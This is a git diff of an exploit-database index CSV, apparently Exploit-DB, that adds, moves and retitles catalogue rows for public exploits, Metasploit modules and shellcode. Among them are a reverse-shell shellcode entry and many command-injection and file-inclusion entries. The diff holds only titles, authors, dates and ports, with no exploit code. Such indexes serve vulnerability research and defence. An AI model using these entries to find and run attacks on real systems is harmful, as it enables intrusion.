@@ -15323,7 +15308,6 @@ id,file,description,date,author,platform,type,port
 38591,platforms/hardware/remote/38591.py,"TP-Link TL-PS110U Print Server - 'tplink-enum.py' Security Bypass",2013-06-19,SANTHO,hardware,remote,0
 38597,platforms/multiple/remote/38597.txt,"Motion - Multiple Vulnerabilities",2013-06-26,xistence,multiple,remote,0
 38599,platforms/win_x86/remote/38599.py,"Symantec pcAnywhere 12.5.0 (Windows x86) - Remote Code Execution",2015-11-02,"Tomislav Paskalev",win_x86,remote,0
-38604,platforms/hardware/remote/38604.txt,"Mobile USB Drive HD - Multiple Local File Inclusion / Arbitrary File Upload Vulnerabilities",2012-06-28,"Benjamin Kunz Mejri",hardware,remote,0
 38632,platforms/hardware/remote/38632.txt,"Multiple Zoom Telephonics Devices - Multiple Vulnerabilities",2013-07-09,"Kyle Lovett",hardware,remote,0
 38627,platforms/android/remote/38627.sh,"Google Android - 'APK' code Remote Security Bypass",2013-07-03,"Bluebox Security",android,remote,0
 38633,platforms/multiple/remote/38633.pl,"Intelligent Platform Management Interface - Information Disclosure",2013-07-02,"Dan Farmer",multiple,remote,0
@@ -15380,7 +15364,6 @@ id,file,description,date,author,platform,type,port
 38849,platforms/cgi/remote/38849.rb,"Advantech Switch - Bash Environment Variable Code Injection (Shellshock) (Metasploit)",2015-12-02,Metasploit,cgi,remote,0
 38850,platforms/hardware/remote/38850.txt,"Thomson Reuters Velocity Analytics - Remote Code Injection",2013-11-22,"Eduardo Gonzalez",hardware,remote,0
 38851,platforms/hardware/remote/38851.html,"LevelOne WBR-3406TX Router - Cross-Site Request Forgery",2013-11-15,"Yakir Wizman",hardware,remote,0
-38853,platforms/hardware/remote/38853.sh,"Multiple D-Link DIR Series Routers - 'model/__show_info.php' Local File Disclosure",2013-12-02,tytusromekiatomek,hardware,remote,0
 38859,platforms/windows/remote/38859.rb,"Oracle BeeHive 2 - voice-servlet processEvaluation() (Metasploit)",2015-12-03,Metasploit,windows,remote,7777
 38860,platforms/windows/remote/38860.rb,"Oracle BeeHive 2 - voice-servlet prepareAudioToPlay() Arbitrary File Upload (Metasploit)",2015-12-03,Metasploit,windows,remote,7777
 38900,platforms/php/remote/38900.rb,"phpFileManager 0.9.8 - Remote Code Execution (Metasploit)",2015-12-08,Metasploit,php,remote,80
@@ -16345,6 +16328,7 @@ id,file,description,date,author,platform,type,port
 42179,platforms/lin_x86-64/shellcode/42179.c,"Linux/x86_64 - execve(_/bin/sh_) Shellcode (24 bytes)",2017-06-15,m4n3dw0lf,lin_x86-64,shellcode,0
 42208,platforms/lin_x86/shellcode/42208.nasm,"Linux/x86 - Reverse UDP Shellcode (668 bytes)",2017-06-20,"DONTON Fetenat C",lin_x86,shellcode,0
 42254,platforms/lin_x86/shellcode/42254.c,"Linux/x86 - Bind Shell Shellcode (75 bytes)",2017-06-26,wetw0rk,lin_x86,shellcode,0
+42339,platforms/lin_x86-64/shellcode/42339.c,"Linux/x86_64 - Reverse Shell (192.168.1.8:4444) Shellcode (104 bytes)",2017-07-19,m4n3dw0lf,lin_x86-64,shellcode,0
 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
@@ -17840,7 +17824,7 @@ id,file,description,date,author,platform,type,port
 3323,platforms/php/webapps/3323.htm,"VS-Link-Partner 2.1 - (script_pfad) Remote File Inclusion",2007-02-16,ajann,php,webapps,0
 3324,platforms/php/webapps/3324.txt,"Htaccess Passwort Generator 1.1 - (ht_pfad) Remote File Inclusion",2007-02-16,kezzap66345,php,webapps,0
 3325,platforms/php/webapps/3325.pl,"webSPELL 4.01.02 - (showonly) Blind SQL Injection",2007-02-16,DNX,php,webapps,0
-3326,platforms/php/webapps/3326.txt,"Vivvo Article Manager 3.4 - (root) Local File Inclusion",2007-02-16,Snip0r,php,webapps,0
+3326,platforms/php/webapps/3326.txt,"Vivvo Article Manager 3.4 - 'root' Local File Inclusion",2007-02-16,Snip0r,php,webapps,0
 3327,platforms/php/webapps/3327.txt,"XLAtunes 0.1 - (album) SQL Injection",2007-02-17,Bl0od3r,php,webapps,0
 3328,platforms/php/webapps/3328.htm,"S-Gastebuch 1.5.3 - (gb_pfad) Remote File Inclusion",2007-02-18,ajann,php,webapps,0
 3332,platforms/php/webapps/3332.pl,"Xpression News 1.0.1 - 'archives.php' Remote File Disclosure",2007-02-18,r0ut3r,php,webapps,0
@@ -23477,7 +23461,7 @@ id,file,description,date,author,platform,type,port
 12242,platforms/jsp/webapps/12242.txt,"RJ-iTop Network Vulnerability Scanner System - Multiple SQL Injections",2010-04-14,wsn1983,jsp,webapps,0
 12245,platforms/php/webapps/12245.txt,"Softbiz B2B trading Marketplace Script - buyers_subcategories SQL Injection",2010-04-15,"AnGrY BoY",php,webapps,0
 12246,platforms/php/webapps/12246.txt,"Joomla! Component Intellectual Property 1.5.3 - 'id' Parameter SQL Injection",2010-04-15,v3n0m,php,webapps,0
-12249,platforms/php/webapps/12249.txt,"60cycleCMS 2.5.2 - (DOCUMENT_ROOT) Multiple Local File Inclusion",2010-04-15,eidelweiss,php,webapps,0
+12249,platforms/php/webapps/12249.txt,"60cycleCMS 2.5.2 - 'DOCUMENT_ROOT' Multiple Local File Inclusion",2010-04-15,eidelweiss,php,webapps,0
 12251,platforms/php/webapps/12251.php,"Camiro-CMS_beta-0.1 - 'FCKeditor' Arbitrary File Upload",2010-04-15,eidelweiss,php,webapps,0
 12254,platforms/php/webapps/12254.txt,"FCKEditor Core - 'FileManager test.html' Arbitrary File Upload (1)",2010-04-16,Mr.MLL,php,webapps,0
 12256,platforms/php/webapps/12256.txt,"ilchClan 1.0.5B - SQL Injection",2010-04-16,"Easy Laster",php,webapps,0
@@ -24339,6 +24323,7 @@ id,file,description,date,author,platform,type,port
 14534,platforms/php/webapps/14534.txt,"68KB 1.0.0rc4 - Remote File Inclusion",2010-08-03,eidelweiss,php,webapps,0
 14558,platforms/php/webapps/14558.txt,"sX-Shop - Multiple SQL Injections",2010-08-05,CoBRa_21,php,webapps,0
 14541,platforms/php/webapps/14541.txt,"WordPress Plugin NextGEN Smooth Gallery 0.12 - Blind SQL Injection",2010-08-03,kaMtiEz,php,webapps,0
+14547,platforms/windows/webapps/14547.txt,"HP OpenView Network Node Manager (OV NNM) 7.53 - 'OvJavaLocale' Buffer Overflow",2010-08-03,"Nahuel Riva",windows,webapps,0
 14557,platforms/php/webapps/14557.txt,"sX-Shop - 'view_image.php' SQL Injection",2010-08-05,secret,php,webapps,0
 14556,platforms/php/webapps/14556.txt,"Nuked-klaN Module Partenaires NK 1.5 - Blind SQL Injection",2010-08-05,Metropolis,php,webapps,0
 14559,platforms/php/webapps/14559.txt,"APBoard 2.1.0 - 'board.php?id=' SQL Injection",2010-08-05,secret,php,webapps,0
@@ -24397,6 +24382,7 @@ id,file,description,date,author,platform,type,port
 14828,platforms/php/webapps/14828.txt,"XOOPS 2.0.14 - 'article.php' SQL Injection",2010-08-28,[]0iZy5,php,webapps,0
 14737,platforms/php/webapps/14737.txt,"Simple Forum PHP - Multiple Vulnerabilities",2010-08-25,arnab_s,php,webapps,0
 14742,platforms/php/webapps/14742.txt,"ClanSphere 2010 - Multiple Vulnerabilities",2010-08-25,Sweet,php,webapps,0
+14818,platforms/linux/webapps/14818.pl,"McAfee LinuxShield 1.5.1 - Local/Remote File Inclusion / Remote Code Execution",2010-08-27,"Nikolas Sotiriu",linux,webapps,0
 14817,platforms/php/webapps/14817.txt,"Esvon Classifieds 4.0 - Multiple Vulnerabilities",2010-08-27,Sn!pEr.S!Te,php,webapps,0
 14806,platforms/php/webapps/14806.txt,"Prometeo 1.0.65 - SQL Injection",2010-08-26,"Lord Tittis3000",php,webapps,0
 14799,platforms/php/webapps/14799.txt,"osCommerce Online Merchant - Remote File Inclusion",2010-08-26,LoSt.HaCkEr,php,webapps,0
@@ -25846,6 +25832,7 @@ id,file,description,date,author,platform,type,port
 18632,platforms/php/webapps/18632.txt,"OneFileCMS - Failure to Restrict URL Access",2012-03-20,"Abhi M Balakrishnan",php,webapps,0
 18626,platforms/jsp/webapps/18626.txt,"ManageEngine DeviceExpert 5.6 Java Server ScheduleResultViewer servlet - Unauthenticated Directory Traversal",2012-03-19,rgod,jsp,webapps,0
 18631,platforms/php/webapps/18631.txt,"OneForum - 'topic.php' SQL Injection",2012-03-20,"Red Security TEAM",php,webapps,0
+18932,platforms/linux/webapps/18932.py,"Symantec Web Gateway 5.0.2 - Local/Remote File Inclusion / Remote Code Execution",2012-05-26,muts,linux,webapps,0
 18638,platforms/hardware/webapps/18638.txt,"D-Link DIR-605 - Cross-Site Request Forgery",2012-03-21,iqzer0,hardware,webapps,0
 18639,platforms/php/webapps/18639.txt,"phpList 2.10.17 - SQL Injection / Cross-Site Scripting",2012-03-21,LiquidWorm,php,webapps,0
 18644,platforms/php/webapps/18644.txt,"vBShout - Persistent Cross-Site Scripting",2012-03-22,ToiL,php,webapps,0
@@ -26098,6 +26085,7 @@ id,file,description,date,author,platform,type,port
 20055,platforms/php/webapps/20055.txt,"MySQL Squid Access Report 2.1.4 - HTML Injection",2012-07-23,"Daniel Godoy",php,webapps,0
 20062,platforms/php/webapps/20062.py,"Alienvault Open Source SIEM (OSSIM) 3.1 - Reflected Cross-Site Scripting / Blind SQL Injection",2012-07-23,muts,php,webapps,0
 20063,platforms/windows/webapps/20063.txt,"SpiceWorks 5.3.75941 - Persistent Cross-Site Scripting / Authenticated SQL Injection",2012-07-23,dookie,windows,webapps,0
+20064,platforms/linux/webapps/20064.py,"Symantec Web Gateway 5.0.3.18 - Local/Remote File Inclusion / Remote Command Execution",2012-07-24,muts,linux,webapps,0
 20083,platforms/php/webapps/20083.txt,"WordPress Plugin Front End Upload 0.5.4.4 - Arbitrary '.PHP' File Upload",2012-07-24,"Chris Kellum",php,webapps,0
 20087,platforms/php/webapps/20087.py,"Zabbix 2.0.1 - Session Extractor",2012-07-24,muts,php,webapps,0
 20111,platforms/php/webapps/20111.rb,"CuteFlow 2.11.2 - Arbitrary File Upload (Metasploit)",2012-07-27,Metasploit,php,webapps,0
@@ -27213,6 +27201,7 @@ id,file,description,date,author,platform,type,port
 23869,platforms/php/webapps/23869.txt,"PHP-Nuke MS-Analysis Module - Multiple Cross-Site Scripting Vulnerabilities",2004-03-22,"Janek Vind",php,webapps,0
 23870,platforms/php/webapps/23870.txt,"PHP-Nuke MS-Analysis Module - HTTP Referrer Field SQL Injection",2004-03-22,"Janek Vind",php,webapps,0
 23872,platforms/jsp/webapps/23872.txt,"reget deluxe 3.0 build 121 - Directory Traversal",2004-03-22,snifer,jsp,webapps,0
+23875,platforms/windows/webapps/23875.txt,"Trend Micro Interscan VirusWall localweb - Directory Traversal",2004-03-24,"Tri Huynh",windows,webapps,0
 23885,platforms/php/webapps/23885.txt,"PhotoPost PHP Pro 3.x/4.x - showgallery.php Multiple Parameter SQL Injection",2004-03-29,JeiAr,php,webapps,0
 23886,platforms/windows/webapps/23886.txt,"Simple Web Server 2.3-rc1 - Directory Traversal",2013-01-04,"CwG GeNiuS",windows,webapps,0
 23888,platforms/php/webapps/23888.txt,"MyBB Profile Wii Friend Code - Multiple Vulnerabilities",2013-01-04,Ichi,php,webapps,0
@@ -28472,6 +28461,7 @@ id,file,description,date,author,platform,type,port
 26295,platforms/php/webapps/26295.txt,"PHPMyFAQ 1.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2005-09-23,rgod,php,webapps,0
 26296,platforms/php/webapps/26296.txt,"PHPMyFAQ 1.5.1 - Local File Inclusion",2005-08-23,rgod,php,webapps,0
 26009,platforms/php/webapps/26009.txt,"AfterLogic WebMail Lite PHP 7.0.1 - Cross-Site Request Forgery",2013-06-07,"Pablo Ribeiro",php,webapps,0
+26012,platforms/windows/webapps/26012.rb,"Novell Zenworks Mobile Device Managment 2.6.1/2.7.0 - Local File Inclusion (Metasploit)",2013-06-07,Metasploit,windows,webapps,80
 26014,platforms/php/webapps/26014.txt,"FForm Sender 1.0 - Processform.php3 Name Cross-Site Scripting",2005-07-19,rgod,php,webapps,0
 26015,platforms/php/webapps/26015.txt,"Form Sender 1.0 - Processform.php3 Failed Cross-Site Scripting",2005-07-19,rgod,php,webapps,0
 26016,platforms/php/webapps/26016.txt,"PHPNews 1.2.x - 'auth.php' SQL Injection",2005-07-20,GHC,php,webapps,0
@@ -29499,6 +29489,7 @@ id,file,description,date,author,platform,type,port
 27314,platforms/php/webapps/27314.txt,"DCI-Taskeen 1.03 - 'cat.php' Multiple Parameter SQL Injections",2006-02-25,Linux_Drox,php,webapps,0
 27315,platforms/php/webapps/27315.txt,"RiteCMS 1.0.0 - Multiple Vulnerabilities",2013-08-03,"Yashar shahinzadeh",php,webapps,0
 27318,platforms/php/webapps/27318.txt,"PHP-Nuke 7.8 - Mainfile.php SQL Injection",2006-02-25,waraxe,php,webapps,0
+27320,platforms/hardware/webapps/27320.txt,"Thomson SpeedTouch 500 Series - LocalNetwork Page name Parameter Cross-Site Scripting",2006-02-25,"Preben Nylokken",hardware,webapps,0
 27321,platforms/php/webapps/27321.txt,"Fantastic News 2.1.1 - SQL Injection",2006-02-27,SAUDI,php,webapps,0
 27322,platforms/php/webapps/27322.txt,"Woltlab Burning Board 1.1.1/2.x - galerie_index.php 'Username' Parameter Cross-Site Scripting",2006-02-27,botan,php,webapps,0
 27323,platforms/php/webapps/27323.txt,"Woltlab Burning Board 1.1.1/2.x - galerie_onfly.php Cross-Site Scripting",2006-02-27,botan,php,webapps,0
@@ -31465,8 +31456,8 @@ id,file,description,date,author,platform,type,port
 30002,platforms/php/webapps/30002.txt,"WordPress Plugin Formcraft - SQL Injection",2013-12-02,"Ashiyane Digital Security Team",php,webapps,0
 30003,platforms/php/webapps/30003.txt,"Campsite 2.6.1 - implementation/Management/configuration.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0
 30004,platforms/php/webapps/30004.txt,"Campsite 2.6.1 - implementation/Management/db_connect.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0
-30005,platforms/php/webapps/30005.txt,"Campsite 2.6.1 - 'LocalizerConfig.php' g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0
-30006,platforms/php/webapps/30006.txt,"Campsite 2.6.1 - 'LocalizerLanguage.php' g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0
+30005,platforms/php/webapps/30005.txt,"Campsite 2.6.1 - 'LocalizerConfig.php' 'g_documentRoot' Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0
+30006,platforms/php/webapps/30006.txt,"Campsite 2.6.1 - 'LocalizerLanguage.php' 'g_documentRoot' Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0
 30012,platforms/php/webapps/30012.txt,"Chamilo Lms 1.9.6 - 'profile.php' 'password0 Parameter SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80
 30013,platforms/php/webapps/30013.txt,"Dokeos 2.2 RC2 - 'index.php' 'language' Parameter SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80
 30062,platforms/hardware/webapps/30062.py,"D-Link DSR Router Series - Remote Command Execution",2013-12-06,0_o,hardware,webapps,0
@@ -31646,6 +31637,7 @@ id,file,description,date,author,platform,type,port
 30465,platforms/php/webapps/30465.txt,"Mapos-Scripts.de Gastebuch 1.5 - 'index.php' Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0
 30466,platforms/php/webapps/30466.txt,"File Uploader 1.1 - 'index.php' config[root_ordner] Parameter Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0
 30467,platforms/php/webapps/30467.txt,"File Uploader 1.1 - datei.php config[root_ordner] Parameter Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0
+30472,platforms/linux/webapps/30472.rb,"Zimbra Collaboration Server 7.2.2/8.0.2 - Local File Inclusion (Metasploit)",2013-12-24,Metasploit,linux,webapps,7071
 30475,platforms/cgi/webapps/30475.txt,"Synology DSM 4.3-3810 - Directory Traversal",2013-12-24,"Andrea Fabrizi",cgi,webapps,80
 30476,platforms/ios/webapps/30476.txt,"Song Exporter 2.1.1 RS iOS - Local File Inclusion",2013-12-24,Vulnerability-Lab,ios,webapps,80
 30478,platforms/php/webapps/30478.txt,"PHP MBB CMS 004 - Multiple Vulnerabilities",2013-12-24,cr4wl3r,php,webapps,80
@@ -33261,6 +33253,7 @@ id,file,description,date,author,platform,type,port
 33090,platforms/hardware/webapps/33090.txt,"TRENDnet TEW-634GRU 1.00.23 - Multiple Vulnerabilities",2014-04-29,SirGod,hardware,webapps,69
 33091,platforms/php/webapps/33091.txt,"NULL NUKE CMS 2.2 - Multiple Vulnerabilities",2014-04-29,LiquidWorm,php,webapps,80
 33347,platforms/jsp/webapps/33347.txt,"McAfee Network Security Manager 5.1.7 - Information Disclosure",2009-11-06,"Daniel King",jsp,webapps,0
+33578,platforms/multiple/webapps/33578.txt,"XAMPP 1.6.x - 'showcode.php' Local File Inclusion",2009-07-16,MustLive,multiple,webapps,0
 33097,platforms/php/webapps/33097.txt,"Programs Rating - rate.php id Parameter Cross-Site Scripting",2009-06-20,Moudi,php,webapps,0
 33098,platforms/php/webapps/33098.txt,"Programs Rating - postcomments.php id Parameter Cross-Site Scripting",2009-06-20,Moudi,php,webapps,0
 33102,platforms/php/webapps/33102.txt,"CommuniGate Pro 5.2.14 - Web Mail URI Parsing HTML Injection",2009-06-23,"Andrea Purificato",php,webapps,0
@@ -33594,6 +33587,7 @@ id,file,description,date,author,platform,type,port
 33736,platforms/aix/webapps/33736.php,"Plesk 10.4.4/11.0.9 - SSO XXE / Cross-Site Scripting Injection",2014-06-13,"BLacK ZeRo",aix,webapps,0
 33760,platforms/multiple/webapps/33760.txt,"Multiple Products - 'banner.swf' Cross-Site Scripting",2010-03-15,MustLive,multiple,webapps,0
 33761,platforms/asp/webapps/33761.txt,"Pars CMS - 'RP' Parameter Multiple SQL Injections",2010-03-15,Isfahan,asp,webapps,0
+33740,platforms/hardware/webapps/33740.txt,"Yealink VoIP Phone SIP-T38G - Local File Inclusion",2014-06-13,Mr.Un1k0d3r,hardware,webapps,0
 33743,platforms/php/webapps/33743.py,"ZeroCMS 1.0 - 'zero_transact_user.php' Handling Privilege Escalation",2014-06-13,"Tiago Carvalho",php,webapps,0
 33759,platforms/multiple/webapps/33759.txt,"DirectAdmin 1.33.6 - 'CMD_DB_VIEW' Cross-Site Scripting",2010-03-14,r0t,multiple,webapps,0
 33748,platforms/php/webapps/33748.txt,"AneCMS 1.0 - 'index.php' Multiple HTML Injection Vulnerabilities",2010-03-11,"pratul agrawal",php,webapps,0
@@ -34622,6 +34616,7 @@ id,file,description,date,author,platform,type,port
 35407,platforms/php/webapps/35407.txt,"phpWebSite 1.7.1 - 'local' Parameter Cross-Site Scripting",2011-03-03,"AutoSec Tools",php,webapps,0
 35408,platforms/php/webapps/35408.txt,"xtcModified 1.05 - Multiple HTML Injection / Cross-Site Scripting Vulnerabilities",2011-03-03,"High-Tech Bridge SA",php,webapps,0
 35409,platforms/php/webapps/35409.txt,"Pragyan CMS 3.0 Beta - Multiple Cross-Site Scripting Vulnerabilities",2011-03-03,"High-Tech Bridge SA",php,webapps,0
+35410,platforms/windows/webapps/35410.py,"InterPhoto Image Gallery 2.4.2 - 'IPLANG' Parameter Local File Inclusion",2011-03-04,"AutoSec Tools",windows,webapps,0
 35411,platforms/asp/webapps/35411.txt,"Kodak InSite 5.5.2 - Troubleshooting/DiagnosticReport.asp HeaderWarning Parameter Cross-Site Scripting",2011-03-07,Dionach,asp,webapps,0
 35412,platforms/asp/webapps/35412.txt,"Kodak InSite 5.5.2 - Pages/login.aspx Language Parameter Cross-Site Scripting",2011-03-07,Dionach,asp,webapps,0
 35416,platforms/php/webapps/35416.txt,"Interleave 5.5.0.2 - 'basicstats.php' Multiple Cross-Site Scripting Vulnerabilities",2011-03-03,"AutoSec Tools",php,webapps,0
@@ -34725,6 +34720,7 @@ id,file,description,date,author,platform,type,port
 35583,platforms/php/webapps/35583.txt,"Piwigo 2.7.2 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,php,webapps,80
 35584,platforms/php/webapps/35584.txt,"GQ File Manager 0.2.5 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,php,webapps,80
 35585,platforms/php/webapps/35585.txt,"Codiad 2.4.3 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,php,webapps,80
+35588,platforms/php/webapps/35588.rb,"Lotus Mail Encryption Server 2.1.0.1 (Protector for Mail) - Local File Inclusion / Remote Code Execution (Metasploit)",2014-12-22,"Patrick Webster",php,webapps,9000
 35591,platforms/php/webapps/35591.txt,"PHPMyRecipes 1.2.2 - 'browse.php' 'category' Parameter SQL Injection",2014-12-23,"Manish Tanwar",php,webapps,80
 35593,platforms/windows/webapps/35593.txt,"SysAid Server - Arbitrary File Disclosure",2014-12-23,"Bernhard Mueller",windows,webapps,0
 35594,platforms/jsp/webapps/35594.txt,"NetIQ Access Manager 4.0 SP1 - Multiple Vulnerabilities",2014-12-23,"SEC Consult",jsp,webapps,8443
@@ -35158,6 +35154,7 @@ id,file,description,date,author,platform,type,port
 36280,platforms/php/webapps/36280.txt,"Symphony 2.2.3 - symphony/publish/images filter Parameter Cross-Site Scripting",2011-11-01,"Mesut Timur",php,webapps,0
 36281,platforms/php/webapps/36281.txt,"Symphony 2.2.3 - symphony/publish/comments filter Parameter SQL Injection",2011-11-01,"Mesut Timur",php,webapps,0
 36284,platforms/asp/webapps/36284.txt,"CmyDocument - Multiple Cross-Site Scripting Vulnerabilities",2011-11-03,demonalex,asp,webapps,0
+36286,platforms/hardware/webapps/36286.txt,"DreamBox DM800 - 'file' Parameter Local File Disclosure",2011-11-04,"Todor Donev",hardware,webapps,0
 36287,platforms/php/webapps/36287.txt,"WordPress Theme Bonus 1.0 - 's' Parameter Cross-Site Scripting",2011-11-04,3spi0n,php,webapps,0
 36289,platforms/php/webapps/36289.txt,"SmartJobBoard - 'keywords' Parameter Cross-Site Scripting",2011-11-07,Mr.PaPaRoSSe,php,webapps,0
 36290,platforms/php/webapps/36290.txt,"Admin Bot - 'news.php' SQL Injection",2011-11-07,baltazar,php,webapps,0
@@ -35540,6 +35537,7 @@ id,file,description,date,author,platform,type,port
 36861,platforms/windows/webapps/36861.txt,"Wing FTP Server Admin 4.4.5 - Multiple Vulnerabilities",2015-04-29,hyp3rlinx,windows,webapps,5466
 36862,platforms/php/webapps/36862.txt,"OS Solution OSProperty 2.8.0 - SQL Injection",2015-04-29,"Brandon Perry",php,webapps,80
 36863,platforms/php/webapps/36863.txt,"Joomla! Component Machine - Multiple SQL Injections",2012-02-20,the_cyber_nuxbie,php,webapps,0
+36865,platforms/hardware/webapps/36865.txt,"Xavi 7968 ADSL Router - webconfig/lan/lan_config.html/local_lan_config host_name_txtbox Parameter Cross-Site Scripting",2012-02-21,Busindre,hardware,webapps,0
 36867,platforms/php/webapps/36867.txt,"CPG Dragonfly CMS 9.3.3.0 - Multiple Multiple Cross-Site Scripting Vulnerabilities",2012-02-21,Ariko-Security,php,webapps,0
 36870,platforms/php/webapps/36870.txt,"ContentLion Alpha 1.3 - 'login.php' Cross-Site Scripting",2012-02-22,"Stefan Schurtz",php,webapps,0
 36873,platforms/php/webapps/36873.txt,"Dolibarr 3.2 Alpha - Multiple Directory Traversal Vulnerabilities",2012-02-22,"Benjamin Kunz Mejri",php,webapps,0
@@ -36227,6 +36225,7 @@ id,file,description,date,author,platform,type,port
 37977,platforms/xml/webapps/37977.py,"Magento eCommerce - Remote Code Execution",2015-08-26,"Manish Tanwar",xml,webapps,0
 37978,platforms/php/webapps/37978.txt,"Gramophone - 'rs' Parameter Cross-Site Scripting",2012-10-25,G13,php,webapps,0
 37979,platforms/php/webapps/37979.txt,"VicBlog - Multiple SQL Injections",2012-10-26,Geek,php,webapps,0
+37982,platforms/hardware/webapps/37982.pl,"TP-Link TL-WR841N Router - Local File Inclusion",2012-10-29,"Matan Azugi",hardware,webapps,0
 37983,platforms/php/webapps/37983.php,"EasyITSP - 'customers_edit.php' Authentication Bypass",2012-10-26,"Michal Blaszczak",php,webapps,0
 37989,platforms/php/webapps/37989.txt,"IP.Board 4.x - Persistent Cross-Site Scripting",2015-08-27,snop,php,webapps,0
 37991,platforms/php/webapps/37991.txt,"WANem - Multiple Cross-Site Scripting Vulnerabilities",2012-10-16,"Brendan Coles",php,webapps,0
@@ -36553,6 +36552,7 @@ id,file,description,date,author,platform,type,port
 38596,platforms/php/webapps/38596.txt,"Xaraya - Multiple Cross-Site Scripting Vulnerabilities",2013-06-26,"High-Tech Bridge",php,webapps,0
 38598,platforms/php/webapps/38598.txt,"ZamFoo - 'date' Parameter Remote Command Injection",2013-06-15,localhost.re,php,webapps,0
 38602,platforms/windows/webapps/38602.txt,"actiTIME 2015.2 - Multiple Vulnerabilities",2015-11-02,LiquidWorm,windows,webapps,0
+38604,platforms/hardware/webapps/38604.txt,"Mobile USB Drive HD - Multiple Local File Inclusion / Arbitrary File Upload Vulnerabilities",2012-06-28,"Benjamin Kunz Mejri",hardware,webapps,0
 38605,platforms/php/webapps/38605.txt,"Nameko - 'nameko.php' Cross-Site Scripting",2013-06-29,"Andrea Menin",php,webapps,0
 38606,platforms/php/webapps/38606.txt,"WordPress Plugin WP Private Messages - 'msgid' Parameter SQL Injection",2013-06-29,"IeDb ir",php,webapps,0
 38607,platforms/php/webapps/38607.txt,"Atomy Maxsite - 'index.php' Arbitrary File Upload",2013-06-30,Iranian_Dark_Coders_Team,php,webapps,0
@@ -36667,6 +36667,7 @@ id,file,description,date,author,platform,type,port
 38844,platforms/php/webapps/38844.html,"WordPress Plugin Blue Wrench Video Widget - Cross-Site Request Forgery",2013-11-23,"Haider Mahmood",php,webapps,0
 38848,platforms/php/webapps/38848.php,"WordPress Theme Suco - 'themify-ajax.php' Arbitrary File Upload",2013-11-20,DevilScreaM,php,webapps,0
 38852,platforms/php/webapps/38852.pl,"PHPThumb - 'PHPThumb.php' Arbitrary File Upload",2013-12-01,DevilScreaM,php,webapps,0
+38853,platforms/hardware/webapps/38853.sh,"Multiple D-Link DIR Series Routers - 'model/__show_info.php' Local File Disclosure",2013-12-02,tytusromekiatomek,hardware,webapps,0
 38855,platforms/php/webapps/38855.txt,"WordPress Plugin Users Ultra 1.5.50 - Blind SQL Injection",2015-12-03,"Panagiotis Vagenas",php,webapps,0
 38856,platforms/php/webapps/38856.txt,"WordPress Plugin Users Ultra 1.5.50 - Persistent Cross-Site Scripting",2015-12-03,"Panagiotis Vagenas",php,webapps,0
 38861,platforms/php/webapps/38861.txt,"WordPress Plugin Gwolle Guestbook 1.5.3 - Remote File Inclusion",2015-12-03,"High-Tech Bridge SA",php,webapps,0
@@ -38146,5 +38147,10 @@ id,file,description,date,author,platform,type,port
 42326,platforms/hardware/webapps/42326.txt,"WDTV Live SMP 2.03.20 - Remote Password Reset",2017-07-14,Sw1tCh,hardware,webapps,0
 42330,platforms/php/webapps/42330.txt,"Orangescrum 1.6.1 - Multiple Vulnerabilities",2017-07-16,tomplixsee,php,webapps,0
 42332,platforms/json/webapps/42332.rb,"Sophos Web Appliance 4.3.0.2 - 'trafficType' Remote Command Injection (Metasploit)",2017-07-18,xort,json,webapps,0
-42333,platforms/hardware/webapps/42333.rb,"Barracuda Load Balancer Firmware <= 6.0.1.006 - Remote Command Injection (Metasploit)",2017-07-18,xort,hardware,webapps,0
+42333,platforms/hardware/webapps/42333.rb,"Barracuda Load Balancer Firmware < 6.0.1.006 - Remote Command Injection (Metasploit)",2017-07-18,xort,hardware,webapps,0
 42335,platforms/multiple/webapps/42335.txt,"PEGA Platform <= 7.2 ML0 - Missing Access Control / Cross-Site Scripting",2017-07-18,"Daniel Correa",multiple,webapps,0
+42342,platforms/cgi/webapps/42342.txt,"Sonicwall Secure Remote Access 8.1.0.2-14sv - Command Injection",2017-07-19,xort,cgi,webapps,0
+42343,platforms/cgi/webapps/42343.rb,"Sonicwall < 8.1.0.6-21sv - 'gencsr.cgi' Command Injection (Metasploit)",2017-07-19,xort,cgi,webapps,0
+42345,platforms/cgi/webapps/42345.rb,"Netscaler SD-WAN 9.1.2.26.561201 - Command Injection (Metasploit)",2017-07-19,xort,cgi,webapps,0
+42344,platforms/cgi/webapps/42344.rb,"Sonicwall < 8.1.0.2-14sv - 'sitecustomization.cgi' Command Injection (Metasploit)",2017-07-19,xort,cgi,webapps,0
+42346,platforms/cgi/webapps/42346.txt,"Citrix CloudBridge - 'CAKEPHP' Cookie Command Injection",2017-07-19,xort,cgi,webapps,0
diff --git a/platforms/cgi/webapps/42342.txt b/platforms/cgi/webapps/42342.txt
new file mode 100755
index 000000000..32aaab107
--- /dev/null
+++ b/platforms/cgi/webapps/42342.txt
